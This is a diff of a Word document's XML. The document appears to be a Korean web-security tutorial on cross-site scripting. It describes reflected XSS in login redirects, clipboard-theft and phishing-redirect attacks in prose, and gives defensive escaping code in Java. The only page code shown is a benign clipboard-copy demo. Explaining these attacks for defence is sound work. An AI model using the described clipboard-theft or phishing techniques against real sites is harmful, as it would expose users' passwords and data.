-            <w:r>
-              <w:t xml:space="preserve"> 복사하세요&lt;/title&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;script src="https://cdn.jsdelivr.net/clipboard.js/1.5.3/clipboard.min.js"&gt;&lt;/script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">&lt;script </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>src</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>="https://code.jquery.com/jquery-3.1.1.min.js"&gt;&lt;/script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;/head&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>window.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> = function(){</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    $(document).ready(function(){</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>var</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> clipboard = new Clipboard('.clipboard');</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    });</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>};</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;/script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>일련번호</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> :</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> &lt;input type = "text" id = "copy" value="8282"&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;button class="clipboard" data-clipboard-target="#copy"&gt; 복사 &lt;/button&gt;</w:t>
-            </w:r>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -474,17 +275,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>실행결</w:t>
-            </w:r>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>과</w:t>
+              <w:t>실행결과</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -492,13 +283,375 @@
           <w:tcPr>
             <w:tcW w:w="9563" w:type="dxa"/>
           </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Reflected XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>취약점이 발생한다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>클립보드 값 탈취</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>키로깅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>클립보드 복사</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 페이지</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9563"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;!DOCTYPE html&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>&lt;head&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;meta http-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>equiv</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>="Content-Type" content="text/html; charset=</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>euc-kr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>" /&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;title&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>중요테이터를</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 복사하세요&lt;/title&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;script src="https://cdn.jsdelivr.net/clipboard.js/1.5.3/clipboard.min.js"&gt;&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;script </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>src</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>="https://code.jquery.com/jquery-3.1.1.min.js"&gt;&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;/head&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>window.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> = function(){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    $(document).ready(function(){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>var</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> clipboard = new Clipboard('.clipboard');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    });</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>일련번호</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> : &lt;input type = "text" id = "copy" value="8282"&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;button class="clipboard" data-clipboard-target="#copy"&gt; 복사 &lt;/button&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="3798"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
           <w:p>
             <w:r>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163697A1" wp14:editId="4763C511">
                   <wp:extent cx="5280212" cy="2330823"/>
                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
                   <wp:docPr id="3" name="그림 3"/>
@@ -513,7 +666,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId7">
+                          <a:blip r:embed="rId6">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -552,11 +705,40 @@
     </w:tbl>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t xml:space="preserve">위와 같이 데이터를 클립보드에 저장하는 기능을 제공하는 사이트가 있다면, 사이트 이용 시 사용자와 관련된 정보가 클립보드에 저장되어 있을 가능성이 높다. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">그 밖에도 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Password”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>와 같은 패스워드 관리 프로그램을 사용하는 사용자들은 패스워드가 클립보드에 저장되어 있어 주의가 필요하다.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -610,11 +792,29 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="304"/>
+        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -634,19 +834,11 @@
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>피싱</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 사이트로 이동</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>피싱 사이트로 이동</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -654,21 +846,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">미리 구성한 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>피싱</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
+        <w:t>미리 구성한 피싱 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -718,6 +896,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -729,65 +912,65 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>크로스</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>스크립팅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 대응방안</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="1"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>크로스</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 대응방안</w:t>
-      </w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>개요</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>개요</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
@@ -818,19 +1001,11 @@
         </w:rPr>
         <w:t xml:space="preserve"> 비교적 쉬운 테스트 코드로 인하여 쉽게 대응할 수 있을 것이라 생각할 수 있지만 상당한 복잡성을 가지고 있다. 이에 </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>네이버의</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> XSS</w:t>
+        <w:t>네이버의 XSS</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1144,6 +1319,14 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">import </w:t>
+            </w:r>
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
@@ -1151,7 +1334,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>import</w:t>
+              <w:t>org.apache</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
@@ -1160,34 +1343,35 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve"> org.apache.commons.lang3.*;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
+              <w:t>.commons.lang3.*;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>public class main {</w:t>
             </w:r>
           </w:p>
@@ -1984,1219 +2168,1209 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">public static String </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>escape</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(String value) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">Pattern </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>escapePattern</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>Pattern.compile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>("'");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+          </w:p>
+          <w:p>
